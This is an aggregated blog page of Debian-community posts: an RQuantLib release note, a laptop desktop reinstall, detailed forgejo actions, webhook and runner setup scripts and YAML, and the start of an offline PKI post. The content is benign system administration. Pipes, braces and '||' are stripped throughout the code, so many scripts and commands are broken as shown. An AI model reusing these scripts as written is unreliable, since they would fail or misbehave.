Search Results: "shell"

25 March 2025

Dirk Eddelbuettel: RQuantLib 0.4.25 on CRAN: Fix Bashism in Configure

A new minor release 0.4.25 of RQuantLib arrived on CRAN this morning, and has just now been uploaded to Debian too. QuantLib is a rather comprehensice free/open-source library for quantitative finance. RQuantLib connects (some parts of) it to the R environment and language, and has been part of CRAN for nearly twenty-two years (!!) as it was one of the first packages I uploaded to CRAN. This release of RQuantLib is tickled by a request to remove bashisms in shell scripts, or, as in my case here, configure.ac where I used the non-portable form of string comparison. That has of course been there for umpteen years and not bitten anyone as the default shell for most is in fact bash but the change has the right idea. And is of course now mandatory affecting quite a few packages is I tooted yesterday. It also contains an improvement to the macOS 14 build kindly contributed by Jeroen.

Changes in RQuantLib version 0.4.25 (2025-03-24)
  • Support macOS 14 with a new compiler flag (Jeroen in #190)
  • Correct two bashisms in configure.ac

One more note, though: This may however be the last release I make with Windows support. CRAN now also checks for forbidden symbols (such as assert or (s)printf or ) in static libraries, and this release tickled one such warning from the Windows side (which only uses static libraries). I have no desire to get involved in also maintaing QuantLib (no R here) for Windows and may simply turn the package back to OS_type: unix to avoid the hassle. To avoid that, it would be fabulous if someone relying on RQuantLib on Windows could step up and lend a hand looking after that library build. Courtesy of my CRANberries, there is also a diffstat report for the this release. As always, more detailed information is on the RQuantLib page. Questions, comments etc should go to the rquantlib-devel mailing list. Issue tickets can be filed at the GitHub repo. If you like this or other open-source work I do, you can now sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

20 March 2025

C.J. Collier: Installing a desktop environment on the HP Omen

dmidecode grep -A8 ^System Information tells me that the Manufacturer is HP and Product Name is OMEN Transcend Gaming Laptop 14-fb0xxx I m provisioning a new piece of hardware for my eng consultant and it s proving more difficult than I expected. I must admit guilt for some of this difficulty. Instead of installing using the debian installer on my keychain, I dd d the pv block device of the 16 inch 2023 version onto the partition set aside from it. I then rebooted into rescue mode and cleaned up the grub config, corrected the EFI boot partition s path in /etc/fstab, ran the grub installer from the rescue menu, and rebooted. On the initial boot of the system, X or Wayland or whatever is supposed to be talking to this vast array of GPU hardware in this device, it s unable to do more than create a black screen on vt1. It s easy enough to switch to vt2 and get a shell on the installed system. So I m doing that and investigating what s changed in Trixie. It seems like it s pretty significant. Did they just throw out Keith Packard s and Behdad Esfahbod s work on font rendering? I don t understand what s happening in this effort to abstract to a simpler interface. I ll probably end up reading more about it. In an effort to have Debian re-configure the system for Desktop use, I have uninstalled as many packages as I could find that were in the display and human interface category, or were firmware/drivers for devices not present in this Laptop s SoC. Some commands I used to clear these packages and re-install connamon follow:
 
dpkg -S /etc/X11
dpkg -S /usr/lib/firmware
apt-get purge $(dpkg -l   grep -i \
  -e gnome -e gtk -e x11-common -e xfonts- -e libvdpau -e dbus-user-session -e gpg-agent \
  -e bluez -e colord -e cups -e fonts -e drm -e xf86 -e mesa -e nouveau -e cinnamon \
  -e avahi -e gdk -e pixel -e desktop -e libreoffice -e x11 -e wayland -e xorg \
  -e firmware-nvidia-graphics -e firmware-amd-graphics -e firmware-mediatek -e firmware-realtek \
    awk ' print $2 ')
apt-get autoremove
apt-get purge $(dpkg -l   grep '^r'   awk ' print $2 ')
tasksel install cinnamon-desktop
 
And then I rebooted. When it came back up, I was greeted with a login prompt, and Trixie looks to be fully functional on this device, including the attached wifi radio, tethering to my android, and the thunderbolt-attached Marvell SFP+ enclosure. I m also installing libvirt and fetched the DVD iso material for Debian, Ubuntu and Rocky in case we have a need of building VMs during the development process. These are the platforms that I target at work with gcp Dataproc, so I m pretty good at performing maintenance operation on them at this point.

18 March 2025

Sergio Talens-Oliag: Using actions to build this site

As promised on my previous post, on this entry I ll explain how I ve set up forgejo actions on the source repository of this site to build it using a runner instead of doing it on the public server using a webhook to trigger the operation.

Setting up the systemThe first thing I ve done is to disable the forgejo webhook call that was used to publish the site, as I don t want to run it anymore. After that I added a new workflow to the repository that does the following things:
  • build the site using my hugo-adoc image.
  • push the result to a branch that contains the generated site (we do this because the server is already configured to work with the git repository and we can use force pushes to keep only the last version of the site, removing the need of extra code to manage package uploads and removals).
  • uses curl to send a notification to an instance of the webhook server installed on the remote server that triggers a script that updates the site using the git branch.

Setting up the webhook serviceOn the server machine we have installed and configured the webhook service to run a script that updates the site. To install the application and setup the configuration we have used the following script:
#!/bin/sh
set -e
# ---------
# VARIABLES
# ---------
ARCH="$(dpkg --print-architecture)"
WEBHOOK_VERSION="2.8.2"
DOWNLOAD_URL="https://github.com/adnanh/webhook/releases/download"
WEBHOOK_TGZ_URL="$DOWNLOAD_URL/$WEBHOOK_VERSION/webhook-linux-$ARCH.tar.gz"
WEBHOOK_SERVICE_NAME="webhook"
# Files
WEBHOOK_SERVICE_FILE="/etc/systemd/system/$WEBHOOK_SERVICE_NAME.service"
WEBHOOK_SOCKET_FILE="/etc/systemd/system/$WEBHOOK_SERVICE_NAME.socket"
WEBHOOK_TML_TEMPLATE="/srv/blogops/action/webhook.yml.envsubst"
WEBHOOK_YML="/etc/webhook.yml"
# Config file values
WEBHOOK_USER="$(id -u)"
WEBHOOK_GROUP="$(id -g)"
WEBHOOK_LISTEN_STREAM="172.31.31.1:4444"
# ----
# MAIN
# ----
# Install binary from releases (on Debian only version 2.8.0 is available, but
# I need the 2.8.2 version to support the systemd activation mode).
curl -fsSL -o "/tmp/webhook.tgz" "$WEBHOOK_TGZ_URL"
tar -C /tmp -xzf /tmp/webhook.tgz
sudo install -m 755 "/tmp/webhook-linux-$ARCH/webhook" /usr/local/bin/webhook
rm -rf "/tmp/webhook-linux-$ARCH" /tmp/webhook.tgz
# Service file
sudo sh -c "cat >'$WEBHOOK_SERVICE_FILE'" <<EOF
[Unit]
Description=Webhook server
[Service]
Type=exec
ExecStart=webhook -nopanic -hooks $WEBHOOK_YML
User=$WEBHOOK_USER
Group=$WEBHOOK_GROUP
EOF
# Socket config
sudo sh -c "cat >'$WEBHOOK_SOCKET_FILE'" <<EOF
[Unit]
Description=Webhook server socket
[Socket]
# Set FreeBind to listen on missing addresses (the VPN can be down sometimes)
FreeBind=true
# Set ListenStream to the IP and port you want to listen on
ListenStream=$WEBHOOK_LISTEN_STREAM
[Install]
WantedBy=multi-user.target
EOF
# Config file
BLOGOPS_TOKEN="$(uuid)" \
  envsubst <"$WEBHOOK_TML_TEMPLATE"   sudo sh -c "cat >$WEBHOOK_YML"
chmod 0640 "$WEBHOOK_YML"
chwon "$WEBHOOK_USER:$WEBHOOK_GROUP" "$WEBHOOK_YML"
# Restart and enable service
sudo systemctl daemon-reload
sudo systemctl stop "$WEBHOOK_SERVICE_NAME.socket"
sudo systemctl start "$WEBHOOK_SERVICE_NAME.socket"
sudo systemctl enable "$WEBHOOK_SERVICE_NAME.socket"
# ----
# vim: ts=2:sw=2:et:ai:sts=2
As seen on the code, we ve installed the application using a binary from the project repository instead of a package because we needed the latest version of the application to use systemd with socket activation. The configuration file template is the following one:
- id: "update-blogops"
  execute-command: "/srv/blogops/action/bin/update-blogops.sh"
  command-working-directory: "/srv/blogops"
  trigger-rule:
    match:
      type: "value"
      value: "$BLOGOPS_TOKEN"
      parameter:
        source: "header"
        name: "X-Blogops-Token"
The version on /etc/webhook.yml has the BLOGOPS_TOKEN adjusted to a random value that has to exported as a secret on the forgejo project (see later). Once the service is started each time the action is executed the webhook daemon will get a notification and will run the following update-blogops.sh script to publish the updated version of the site:
#!/bin/sh
set -e
# ---------
# VARIABLES
# ---------
# Values
REPO_URL="ssh://git@forgejo.mixinet.net/mixinet/blogops.git"
REPO_BRANCH="html"
REPO_DIR="public"
MAIL_PREFIX="[BLOGOPS-UPDATE-ACTION] "
# Address that gets all messages, leave it empty if not wanted
MAIL_TO_ADDR="blogops@mixinet.net"
# Directories
BASE_DIR="/srv/blogops"
PUBLIC_DIR="$BASE_DIR/$REPO_DIR"
NGINX_BASE_DIR="$BASE_DIR/nginx"
PUBLIC_HTML_DIR="$NGINX_BASE_DIR/public_html"
ACTION_BASE_DIR="$BASE_DIR/action"
ACTION_LOG_DIR="$ACTION_BASE_DIR/log"
# Files
OUTPUT_BASENAME="$(date +%Y%m%d-%H%M%S.%N)"
ACTION_LOGFILE_PATH="$ACTION_LOG_DIR/$OUTPUT_BASENAME.log"
# ---------
# Functions
# ---------
action_log()  
  echo "$(date -R) $*" >>"$ACTION_LOGFILE_PATH"
 
action_check_directories()  
  for _d in "$ACTION_BASE_DIR" "$ACTION_LOG_DIR"; do
    [ -d "$_d" ]   mkdir "$_d"
  done
 
action_clean_directories()  
  # Try to remove empty dirs
  for _d in "$ACTION_LOG_DIR" "$ACTION_BASE_DIR"; do
    if [ -d "$_d" ]; then
      rmdir "$_d" 2>/dev/null   true
    fi
  done
 
mail_success()  
  to_addr="$MAIL_TO_ADDR"
  if [ "$to_addr" ]; then
    subject="OK - updated blogops site"
    mail -s "$ MAIL_PREFIX $ subject " "$to_addr" <"$ACTION_LOGFILE_PATH"
  fi
 
mail_failure()  
  to_addr="$MAIL_TO_ADDR"
  if [ "$to_addr" ]; then
    subject="KO - failed to update blogops site"
    mail -s "$ MAIL_PREFIX $ subject " "$to_addr" <"$ACTION_LOGFILE_PATH"
  fi
  exit 1
 
# ----
# MAIN
# ----
ret="0"
# Check directories
action_check_directories
# Go to the base directory
cd "$BASE_DIR"
# Remove the old build dir if present
if [ -d "$PUBLIC_DIR" ]; then
  rm -rf "$PUBLIC_DIR"
fi
# Update the repository checkout
action_log "Updating the repository checkout"
git fetch --all >>"$ACTION_LOGFILE_PATH" 2>&1   ret="$?"
if [ "$ret" -ne "0" ]; then
  action_log "Failed to update the repository checkout"
  mail_failure
fi
# Get it from the repo branch & extract it
action_log "Downloading and extracting last site version using 'git archive'"
git archive --remote="$REPO_URL" "$REPO_BRANCH" "$REPO_DIR" \
    tar xf - >>"$ACTION_LOGFILE_PATH" 2>&1   ret="$?"
# Fail if public dir was missing
if [ "$ret" -ne "0" ]   [ ! -d "$PUBLIC_DIR" ]; then
  action_log "Failed to download or extract site"
  mail_failure
fi
# Remove old public_html copies
action_log 'Removing old site versions, if present'
find $NGINX_BASE_DIR -mindepth 1 -maxdepth 1 -name 'public_html-*' -type d \
  -exec rm -rf   \; >>"$ACTION_LOGFILE_PATH" 2>&1   ret="$?"
if [ "$ret" -ne "0" ]; then
  action_log "Removal of old site versions failed"
  mail_failure
fi
# Switch site directory
TS="$(date +%Y%m%d-%H%M%S)"
if [ -d "$PUBLIC_HTML_DIR" ]; then
  action_log "Moving '$PUBLIC_HTML_DIR' to '$PUBLIC_HTML_DIR-$TS'"
  mv "$PUBLIC_HTML_DIR" "$PUBLIC_HTML_DIR-$TS" >>"$ACTION_LOGFILE_PATH" 2>&1  
    ret="$?"
fi
if [ "$ret" -eq "0" ]; then
  action_log "Moving '$PUBLIC_DIR' to '$PUBLIC_HTML_DIR'"
  mv "$PUBLIC_DIR" "$PUBLIC_HTML_DIR" >>"$ACTION_LOGFILE_PATH" 2>&1  
    ret="$?"
fi
if [ "$ret" -ne "0" ]; then
  action_log "Site switch failed"
  mail_failure
else
  action_log "Site updated successfully"
  mail_success
fi
# ----
# vim: ts=2:sw=2:et:ai:sts=2

The hugo-adoc workflowThe workflow is defined in the .forgejo/workflows/hugo-adoc.yml file and looks like this:
name: hugo-adoc
# Run this job on push events to the main branch
on:
  push:
    branches:
      - 'main'
jobs:
  build-and-push:
    if: $  vars.BLOGOPS_WEBHOOK_URL != '' && secrets.BLOGOPS_TOKEN != ''  
    runs-on: docker
    container:
      image: forgejo.mixinet.net/oci/hugo-adoc:latest
    # Allow the job to write to the repository (not really needed on forgejo)
    permissions:
      contents: write
    steps:
      - name: Checkout the repo
        uses: actions/checkout@v4
        with:
          submodules: 'true'
      - name: Build the site
        shell: sh
        run:  
          rm -rf public
          hugo
      - name: Push compiled site to html branch
        shell: sh
        run:  
          # Set the git user
          git config --global user.email "blogops@mixinet.net"
          git config --global user.name "BlogOps"
          # Create a new orphan branch called html (it was not pulled by the
          # checkout step)
          git switch --orphan html
          # Add the public directory to the branch
          git add public
          # Commit the changes
          git commit --quiet -m "Updated site @ $(date -R)" public
          # Push the changes to the html branch
          git push origin html --force
          # Switch back to the main branch
          git switch main
      - name: Call the blogops update webhook endpoint
        shell: sh
        run:  
          HEADER="X-Blogops-Token: $  secrets.BLOGOPS_TOKEN  "
          curl --fail -k -H "$HEADER" $  vars.BLOGOPS_WEBHOOK_URL  
The only relevant thing is that we have to add the BLOGOPS_TOKEN variable to the project secrets (its value is the one included on the /etc/webhook.yml file created when installing the webhook service) and the BLOGOPS_WEBHOOK_URL project variable (its value is the URL of the webhook server, in my case http://172.31.31.1:4444/hooks/update-blogops); note that the job includes the -k flag on the curl command just in case I end up using TLS on the webhook server in the future, as discussed previously.

ConclusionNow that I have forgejo actions on my server I no longer need to build the site on the public server as I did initially, a good thing when the server is a small OVH VPS that only runs a couple of containers and a web server directly on the host. I m still using a notification system to make the server run a script to update the site because that way the forgejo server does not need access to the remote machine shell, only the webhook server which, IMHO, is a more secure setup.

17 March 2025

Sergio Talens-Oliag: Configuring forgejo actions

Last week I decided I wanted to try out forgejo actions to build this blog instead of using webhooks, so I looked the documentation and started playing with it until I had it working as I wanted. This post is to describe how I ve installed and configured a forgejo runner, how I ve added an oci organization to my instance to build, publish and mirror container images and added a couple of additional organizations (actions and docker for now) to mirror interesting actions. The changes made to build the site using actions will be documented on a separate post, as I ll be using this entry to test the new setup on the blog project.

Installing the runnerThe first thing I ve done is to install a runner on my server, I decided to use the OCI image installation method, as it seemed to be the easiest and fastest one. The commands I ve used to setup the runner are the following:
$ cd /srv
$ git clone https://forgejo.mixinet.net/blogops/forgejo-runner.git
$ cd forgejo-runner
$ sh ./bin/setup-runner.sh
The setup-runner.sh script does multiple things:
  • create a forgejo-runner user and group
  • create the necessary directories for the runner
  • create a .runner file with a predefined secret and the docker label
The setup-runner.sh code is available here. After running the script the runner has to be registered with the forgejo server, it can be done using the following command:
$ forgejo forgejo-cli actions register --name "$RUNNER_NAME" \
    --secret "$FORGEJO_SECRET"
The RUNNER_NAME variable is defined on the setup-runner.sh script and the FORGEJO_SECRET must match the value used on the .runner file.

Starting it with docker-composeTo launch the runner I m going to use a docker-compose.yml file that starts two containers, a docker in docker service to run the containers used by the workflow jobs and another one that runs the forgejo-runner itself. The initial version used a TCP port to communicate with the dockerd server from the runner, but when I tried to build images from a workflow I noticed that the containers launched by the runner were not going to be able to execute another dockerd inside the dind one and, even if they were, it was going to be expensive computationally. To avoid the issue I modified the dind service to use a unix socket on a shared volume that can be used by the runner service to communicate with the daemon and also re-shared with the job containers so the dockerd server can be used from them to build images.
Warning: The use of the same docker server that runs the jobs from them has security implications, but this instance is for a home server where I am the only user, so I am not worried about it and this way I can save some resources (in fact, I could use the host docker server directly instead of using a dind service, but just in case I want to run other containers on the host I prefer to keep the one used for the runner isolated from it). For those concerned about sharing the same server an alternative would be to launch a second dockerd only for the jobs (i.e. actions-dind) using the same approach (the volume with its socket will have to be shared with the runner service so it can be re-shared, but the runner does not need to use it).
The final docker-compose.yaml file is as follows:
services:
  dind:
    image: docker:dind
    container_name: 'dind'
    privileged: 'true'
    command: ['dockerd', '-H', 'unix:///dind/docker.sock', '-G', '$RUNNER_GID']
    restart: 'unless-stopped'
    volumes:
      - ./dind:/dind
  runner:
    image: 'data.forgejo.org/forgejo/runner:6.2.2'
    links:
      - dind
    depends_on:
      dind:
        condition: service_started
    container_name: 'runner'
    environment:
      DOCKER_HOST: 'unix:///dind/docker.sock'
    user: $RUNNER_UID:$RUNNER_GID
    volumes:
      - ./config.yaml:/config.yaml
      - ./data:/data
      - ./dind:/dind
    restart: 'unless-stopped'
    command: '/bin/sh -c "sleep 5; forgejo-runner daemon -c /config.yaml"'
There are multiple things to comment about this file:
  1. The dockerd server is started with the -H unix:///dind/docker.sock flag to use the unix socket to communicate with the daemon instead of using a TCP port (as said, it is faster and allows us to share the socket with the containers started by the runner).
  2. We are running the dockerd daemon with the RUNNER_GID group so the runner can communicate with it (the socket gets that group which is the same used by the runner).
  3. The runner container mounts three volumes: the data directory, the dind folder where docker creates the unix socket and a config.yaml file used by us to change the default runner configuration.
The config.yaml file was originally created using the forgejo-runner:
$ docker run --rm data.forgejo.org/forgejo/runner:6.2.2 \
    forgejo-runner generate-config > config.yaml
The changes to it are minimal, the runner capacity has been increased to 2 (that allows it to run two jobs at the same time) and the /dind/docker.sock value has been added to the valid_volumes key to allow the containers launched by the runner to mount it when needed; the diff against the default version is as follows:
@@ -13,7 +13,8 @@
   # Where to store the registration result.
   file: .runner
   # Execute how many tasks concurrently at the same time.
-  capacity: 1
+  # STO: Allow 2 concurrent tasks
+  capacity: 2
   # Extra environment variables to run jobs.
   envs:
     A_TEST_ENV_NAME_1: a_test_env_value_1
@@ -87,7 +88,9 @@
   # If you want to allow any volume, please use the following configuration:
   # valid_volumes:
   #   - '**'
-  valid_volumes: []
+  # STO: Allow to mount the /dind/docker.sock on the containers
+  valid_volumes:
+    - /dind/docker.sock
   # overrides the docker client host with the specified one.
   # If "-" or "", an available docker host will automatically be found.
   # If "automount", an available docker host will automatically be found and ...
To start the runner we export the RUNNER_UID and RUNNER_GID variables and call docker-compose up to start the containers on the background:
$ RUNNER_UID="$(id -u forgejo-runner)" RUNNER_GID="$(id -g forgejo-runner)" \
    docker compose up -d
If the server was configured right we are now able to start using actions with this runner.

Preparing the system to run things locallyTo avoid unnecessary network traffic we are going to create a multiple organizations in our forgejo instance to maintain our own actions and container images and mirror remote ones. The rationale behind the mirror use is that we reduce a lot the need to connect to remote servers to download the actions and images, which is good for performance and security reasons. In fact, we are going to build our own images for some things to install the tools we want without needing to do it over and over again on the workflow jobs.

Mirrored actionsThe actions we are mirroring are on the actions and docker organizations, we have created the following ones for now (the mirrors were created using the forgejo web interface and we have disabled manually all the forgejo modules except the code one for them):
To use our actions by default (i.e., without needing to add the server URL on the uses keyword) we have added the following section to the app.ini file of our forgejo server:
[actions]
ENABLED = true
DEFAULT_ACTIONS_URL = https://forgejo.mixinet.net

Setting up credentials to push imagesTo be able to push images to the oci organization I ve created a token with package:write permission for my own user because I m a member of the organization and I m authorized to publish packages on it (a different user could be created, but as I said this is for personal use, so there is no need to complicate things for now). To allow the use of those credentials on the actions I have added a secret (REGISTRY_PASS) and a variable (REGISTRY_USER) to the oci organization to allow the actions to use them. I ve also logged myself on my local docker client to be able to push images to the oci group by hand, as I it is needed for bootstrapping the system (as I m using local images on the worflows I need to push them to the server before running the ones that are used to build the images).

Local and mirrored imagesOur images will be stored on the packages section of a new organization called oci, inside it we have created two projects that use forgejo actions to keep things in shape:
  • images: contains the source files used to generate our own images and the actions to build, tag and push them to the oci organization group.
  • mirrors: contains a configuration file for the regsync tool to mirror containers and an action to run it.
On the next sections we are going to describe the actions and images we have created and mirrored from those projects.

The oci/images projectThe images project is a monorepo that contains the source files for the images we are going to build and a couple of actions. The image sources are on sub directories of the repository, to be considered an image the folder has to contain a Dockerfile that will be used to build the image. The repository has two workflows:
  • build-image-from-tag: Workflow to build, tag and push an image to the oci organization
  • multi-semantic-release: Workflow to create tags for the images using the multi-semantic-release tool.
As the workflows are already configured to use some of our images we pushed some of them from a checkout of the repository using the following commands:
registry="forgejo.mixinet.net/oci"
for img in alpine-mixinet node-mixinet multi-semantic-release; do
  docker build -t $registry/$img:1.0.0 $img
  docker tag $registry/$img:1.0.0 $registry/$img:latest
  docker push $registry/$img:1.0.0
  docker push $registry/$img:latest
done
On the next sub sections we will describe what the workflows do and will show their source code.

build-image-from-tag workflowThis workflow uses a docker client to build an image from a tag on the repository with the format image-name-v[0-9].[0-9].[0-9]+. As the runner is executed on a container (instead of using lxc) it seemed unreasonable to run another dind container from that one, that is why, after some tests, I decided to share the dind service server socket with the runner container and enabled the option to mount it also on the containers launched by the runner when needed (I only do it on the build-image-from-tag action for now). The action was configured to run using a trigger or when new tags with the right format were created, but when the tag is created by multi-semantic-release the trigger does not work for some reason, so now it only runs the job on triggers and checks if it is launched for a tag with the right format on the job itself. The source code of the action is as follows:
name: build-image-from-tag
on:
  workflow_dispatch:
jobs:
  build:
    # Don't build the image if the registry credentials are not set, the ref is not a tag or it doesn't contain '-v'
    if: $  vars.REGISTRY_USER != '' && secrets.REGISTRY_PASS != '' && startsWith(github.ref, 'refs/tags/') && contains(github.ref, '-v')  
    runs-on: docker
    container:
      image: forgejo.mixinet.net/oci/node-mixinet:latest
      # Mount the dind socket on the container at the default location
      options: -v /dind/docker.sock:/var/run/docker.sock
    steps:
      - name: Extract image name and tag from git and get registry name from env
        id: job_data
        run:  
          echo "::set-output name=img_name::$ GITHUB_REF_NAME%%-v* "
          echo "::set-output name=img_tag::$ GITHUB_REF_NAME##*-v "
          echo "::set-output name=registry::$(
            echo "$  github.server_url  "   sed -e 's%https://%%'
          )"
          echo "::set-output name=oci_registry_prefix::$(
            echo "$  github.server_url  /oci"   sed -e 's%https://%%'
          )"
      - name: Checkout the repo
        uses: actions/checkout@v4
      - name: Export build dir and Dockerfile
        id: build_data
        run:  
          img="$  steps.job_data.outputs.img_name  "
          build_dir="$(pwd)/$ img "
          dockerfile="$ build_dir /Dockerfile"
          if [ -f "$dockerfile" ]; then
            echo "::set-output name=build_dir::$build_dir"
            echo "::set-output name=dockerfile::$dockerfile"
          else
            echo "Couldn't find the Dockerfile for the '$img' image"
            exit 1
          fi
      - name: Login to the Container Registry
        uses: docker/login-action@v3
        with:
          registry: $  steps.job_data.outputs.registry  
          username: $  vars.REGISTRY_USER  
          password: $  secrets.REGISTRY_PASS  
      - name: Set up Docker Buildx
        uses: docker/setup-buildx-action@v3
      - name: Build and Push
        uses: docker/build-push-action@v6
        with:
          push: true
          tags:  
            $  steps.job_data.outputs.oci_registry_prefix  /$  steps.job_data.outputs.img_name  :$  steps.job_data.outputs.img_tag  
            $  steps.job_data.outputs.oci_registry_prefix  /$  steps.job_data.outputs.img_name  :latest
          context: $  steps.build_data.outputs.build_dir  
          file: $  steps.build_data.outputs.dockerfile  
          build-args:  
            OCI_REGISTRY_PREFIX=$  steps.job_data.outputs.oci_registry_prefix  /
Some notes about this code:
  1. The if condition of the build job is not perfect, but it is good enough to avoid wrong uses as long as nobody uses manual tags with the wrong format and expects things to work (it checks if the REGISTRY_USER and REGISTRY_PASS variables are set, if the ref is a tag and if it contains the -v string).
  2. To be able to access the dind socket we mount it on the container using the options key on the container section of the job (this only works if supported by the runner configuration as explained before).
  3. We use the job_data step to get information about the image from the tag and the registry URL from the environment variables, it is executed first because all the information is available without checking out the repository.
  4. We use the job_data step to get the build dir and Dockerfile paths from the repository (right now we are assuming fixed paths and checking if the Dockerfile exists, but in the future we could use a configuration file to get them, if needed).
  5. As we are using a docker daemon that is already running there is no need to use the docker/setup-docker-action to install it.
  6. On the build and push step we pass the OCI_REGISTRY_PREFIX build argument to the Dockerfile to be able to use it on the FROM instruction (we are using it in our images).

multi-semantic-release workflowThis workflow is used to run the multi-semantic-release tool on pushes to the main branch. It is configured to create the configuration files on the fly (it prepares things to tag the folders that contain a Dockerfile using a couple of template files available on the repository s .forgejo directory) and run the multi-semantic-release tool to create tags and push them to the repository if new versions are to be built. Initially we assumed that the tag creation pushed by multi-semantic-release would be enough to run the build-tagged-image-task action, but as it didn t work we removed the rule to run the action on tag creation and added code to trigger the action using an api call for the newly created tags (we get them from the output of the multi-semantic-release execution). The source code of the action is as follows:
name: multi-semantic-release
on:
  push:
    branches:
      - 'main'
jobs:
  multi-semantic-release:
    runs-on: docker
    container:
      image: forgejo.mixinet.net/oci/multi-semantic-release:latest
    steps:
      - name: Checkout the repo
        uses: actions/checkout@v4
      - name: Generate multi-semantic-release configuration
        shell: sh
        run:  
          # Get the list of images to work with (the folders that have a Dockerfile)
          images="$(for img in */Dockerfile; do dirname "$img"; done)"
          # Generate a values.yaml file for the main packages.json file
          package_json_values_yaml=".package.json-values.yaml"
          echo "images:" >"$package_json_values_yaml"
          for img in $images; do
            echo " - $img" >>"$package_json_values_yaml"
          done
          echo "::group::Generated values.yaml for the project"
          cat "$package_json_values_yaml"
          echo "::endgroup::"
          # Generate the package.json file validating that is a good json file with jq
          tmpl -f "$package_json_values_yaml" ".forgejo/package.json.tmpl"   jq . > "package.json"
          echo "::group::Generated package.json for the project"
          cat "package.json"
          echo "::endgroup::"
          # Remove the temporary values file
          rm -f "$package_json_values_yaml"
          # Generate the package.json file for each image
          for img in $images; do
            tmpl -v "img_name=$img" -v "img_path=$img" ".forgejo/ws-package.json.tmpl"   jq . > "$img/package.json"
            echo "::group::Generated package.json for the '$img' image"
            cat "$img/package.json"
            echo "::endgroup::"
          done
      - name: Run multi-semantic-release
        shell: sh
        run:  
          multi-semantic-release   tee .multi-semantic-release.log
      - name: Trigger builds
        shell: sh
        run:  
          # Get the list of tags published on the previous steps
          tags="$(
            sed -n -e 's/^\[.*\] \[\(.*\)\] .* Published release \([0-9]\+\.[0-9]\+\.[0-9]\+\) on .*$/\1-v\2/p' \
              .multi-semantic-release.log
          )"
          rm -f .multi-semantic-release.log
          if [ "$tags" ]; then
            # Prepare the url for building the images
            workflow="build-image-from-tag.yaml"
            dispatch_url="$  github.api_url  /repos/$  github.repository  /actions/workflows/$workflow/dispatches"
            echo "$tags"   while read -r tag; do
              echo "Triggering build for tag '$tag'"
              curl \
                -H "Content-Type:application/json" \
                -H "Authorization: token $  secrets.GITHUB_TOKEN  " \
                -d " \"ref\":\"$tag\" " "$dispatch_url"
            done
          fi
Notes about this code:
  1. The use of the tmpl tool to process the multi-semantic-release configuration templates comes from previous uses, but on this case we could use a different approach (i.e. envsubst could be used) but we left it because it keeps things simple and can be useful in the future if we want to do more complex things with the template files.
  2. We use tee to show and dump to a file the output of the multi-semantic-release execution.
  3. We get the list of pushed tags using sed against the output of the multi-semantic-release execution and for each one found we use curl to call the forgejo API to trigger the build job; as the call is against the same project we can use the GITHUB_TOKEN generated for the workflow to do it, without creating a user token that has to be shared as a secret.
The .forgejo/package.json.tmpl file is the following one:
 
  "name": "multi-semantic-release",
  "version": "0.0.0-semantically-released",
  "private": true,
  "multi-release":  
    "tagFormat": "$ name -v$ version "
   ,
  "workspaces":   .images   toJson  
 
As can be seen it only needs a list of paths to the images as argument (the file we generate contains the names and paths, but it could be simplified). And the .forgejo/ws-package.json.tmpl file is the following one:
 
  "name": "  .img_name  ",
  "license": "UNLICENSED",
  "release":  
    "plugins": [
      [
        "@semantic-release/commit-analyzer",
         
          "preset": "conventionalcommits",
          "releaseRules": [
              "breaking": true, "release": "major"  ,
              "revert": true, "release": "patch"  ,
              "type": "feat", "release": "minor"  ,
              "type": "fix", "release": "patch"  ,
              "type": "perf", "release": "patch"  
          ]
         
      ],
      [
        "semantic-release-replace-plugin",
         
          "replacements": [
             
              "files": [ "  .img_path  /msr.yaml" ],
              "from": "^version:.*$",
              "to": "version: $ nextRelease.version ",
              "allowEmptyPaths": true
             
          ]
         
      ],
      [
        "@semantic-release/git",
         
          "assets": [ "msr.yaml" ],
          "message": "ci(release):   .img_name  -v$ nextRelease.version \n\n$ nextRelease.notes "
         
      ]
    ],
    "branches": [ "main" ]
   
 

The oci/mirrors projectThe repository contains a template for the configuration file we are going to use with regsync (regsync.envsubst.yml) to mirror images from remote registries using a workflow that generates a configuration file from the template and runs the tool. The initial version of the regsync.envsubst.yml file is prepared to mirror alpine containers from version 3.21 to 3.29 (we explicitly remove version 3.20) and needs the forgejo.mixinet.net/oci/node-mixinet:latest image to run (as explained before it was pushed manually to the server):
version: 1
creds:
  - registry: "$REGISTRY"
    user: "$REGISTRY_USER"
    pass: "$REGISTRY_PASS"
sync:
  - source: alpine
    target: $REGISTRY/oci/alpine
    type: repository
    tags:
      allow:
        - "latest"
        - "3\\.2\\d+"
        - "3\\.2\\d+.\\d+"
      deny:
        - "3\\.20"
        - "3\\.20.\\d+"

mirror workflowThe mirror workflow creates a configuration file replacing the value of the REGISTRY environment variable (computed by removing the protocol from the server_url), the REGISTRY_USER organization value and the REGISTRY_PASS secret using the envsubst command and running the regsync tool to mirror the images using the configuration file. The action is configured to run daily, on push events when the regsync.envsubst.yml file is modified on the main branch and can also be triggered manually. The source code of the action is as follows:
.forgejo/workflows/mirror.yaml
name: mirror
on:
  schedule:
    - cron: '@daily'
  push:
    branches:
      - main
    paths:
      - 'regsync.envsubst.yml'
  workflow_dispatch:
jobs:
  mirror:
    if: $  vars.REGISTRY_USER != '' && secrets.REGISTRY_PASS != ''  
    runs-on: docker
    container:
      image: forgejo.mixinet.net/oci/node-mixinet:latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Sync images
        run:  
          REGISTRY="$(echo "$  github.server_url  "   sed -e 's%https://%%')" \
          REGISTRY_USER="$  vars.REGISTRY_USER  " \
          REGISTRY_PASS="$  secrets.REGISTRY_PASS  " \
            envsubst <regsync.envsubst.yml >.regsync.yml
          regsync --config .regsync.yml once
          rm -f .regsync.yml

ConclusionWe have installed a forgejo-runner and configured it to run actions for our own server and things are working fine. This approach allows us to have a powerful CI/CD system on a modest home server, something very useful for maintaining personal projects and playing with things without needing SaaS platforms like github or gitlab.

Vincent Bernat: Offline PKI using 3 YubiKeys and an ARM single board computer

An offline PKI enhances security by physically isolating the certificate authority from network threats. A YubiKey is a low-cost solution to store a root certificate. You also need an air-gapped environment to operate the root CA.
PKI relying on a set of 3 YubiKeys: 2 for the root CA and 1 for the intermediate CA.
Offline PKI backed up by 3 YubiKeys
This post describes an offline PKI system using the following components: It is possible to add more YubiKeys as a backup of the root CA if needed. This is not needed for the intermediate CA as you can generate a new one if the current one gets destroyed.

